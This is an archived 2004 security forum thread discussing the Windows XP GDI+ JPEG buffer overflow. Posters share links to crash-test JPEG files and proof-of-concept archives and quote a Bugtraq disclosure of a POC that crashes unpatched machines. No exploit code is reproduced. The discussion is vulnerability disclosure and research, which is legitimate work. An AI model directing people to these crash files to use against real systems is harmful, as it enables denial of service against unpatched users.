http://sec.gravito.com/crash/test1.jpg

Click on it and it tries to open that jpeg as an xml. It used to be that if you included this jpg as an inline image it would screw up the browser for the whole session too. I don't know if that is an issue anymore.
JeiAr
Sep 17 2004, 11:54 PM
Maybe that is some sort of wannabe mime spoofing? My browser says:

The image "http://sec.gravito.com/crash/test1.jpg" cannot be displayed, because it contains errors.

dissolutions
Sep 18 2004, 12:14 AM
firefox rules biggrin.gif laugh.gif
Thom
Sep 18 2004, 01:29 PM
so does mozilla smile.gif
JeiAr
Sep 18 2004, 01:51 PM
Actually, yes, my POC was the same one used on security.nnov.ru

But they used my file tongue.gif Just noticed that.

http://www.security.nnov.ru/files/jpegcompoc.zip
A2_
Sep 18 2004, 02:15 PM
QUOTE (Yorn @ Sep 16 2004, 01:34 PM)
Actually JeiAr, I think the jpeg issue you were referring to was an issue listed on the VulnDev mailing list, not Bugtraq. But yeah.. interesting stuff.

QUOTE
GulfTech Security <security@gulftech.org> to bugtraq
Sep 16 (2 days ago)

From: GulfTech Security <security@gulftech.org>
To: bugtraq@securityfocus.com
Date: Thu, 16 Sep 2004 12:53:15 -0500
Subject: JPEG Processing BOF Proof Of Concept

About a year ago I came across this same issue. I came across it while
messing with Solar Designer's old Netscape JPEG bug. So, in short the same
issue applies to WinXP it seems. I showed the bug to a few people (even
contacted Microsoft, but got no reply), but neither them nor myself ever got
around to figuring it out. Nick DeBaggis and eEye did a good job of figuring
this very dangerous issue out smile.gif

Anyway, the point to this post is to release the POC I just put together
using the findings that I have been sitting on for quite some time. As I
said before, I never fully understood exactly what was going on, so this POC
doesn't execute code or anything, but it will crash any WindowsXP machine
that has not been patched from this flaw.

If you cannot access the attached file, you may download the POC here

http://www.gulftech.org/?node=downloads

BTW: There was a BugTraq (or some other sec mailing list) post from over a
year ago that talks about the Netscape JPEG issue crashing the WindowsXP
Shell. I remember seeing them when I first started looking into this issue,
but do not have links right off hand. Maybe someone else reading this does?


  jpegcompoc.zip - 7K Download


tongue.gif

QUOTE
Gmail - Search results for: jpeg:

  Ronald .. Roger, Kenton (6)  Security Basics[List] Detecting new Windows .jpeg exploit  - . exploit in Microsoft's .jpeg handling code, posted here: http://secunia.com/advisories .  8:32am
  admin  Bugtraq[List] [exploitwatch.org] ALERT: Windows XP JPEG Buffer Overflow... - . the Windows XP JPEG has been published. Because of the potential impact, it is anticipated that .  Sep 17
  Polazzo .. Gary, Matt (6)  Bugtraq[List] RE: Microsoft GDIPlus.DLL JPEG Parsing Engine Buffer Over... - I am trying to distribute the patch via patch management software, the problem is, Do I replace .  Sep 17
  GulfTech Security  Bugtraq[List] JPEG Processing BOF Proof Of Concept - . Designer's old Netscape JPEG bug. So, in short the same issue applies to WinXP it seems. I . [jpegcompoc.zip]  Sep 16


<3 my gmail
brOmstar
Sep 18 2004, 05:22 PM
http://www.security.nnov.ru/files/CRASH-TEST.zip

this one was posted one day before ur version was added.
JeiAr
Sep 19 2004, 04:16 PM
Does it work? I have heard from a few people it didn't. unsure.gif
Yorn
Sep 20 2004, 03:22 PM
None of them work. But then again, this workstation I'm on is supposedly patched. It's wierd though, I don't think this patch required a reboot.
Kynroxes
Sep 20 2004, 08:45 PM
You right Yorn, this service pack doesn't required a reboot ...
lynx rulezz too !! I'm so idiot sorry ;p
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.
 
Invision Power Board © 2001-2005 Invision Power Services, Inc.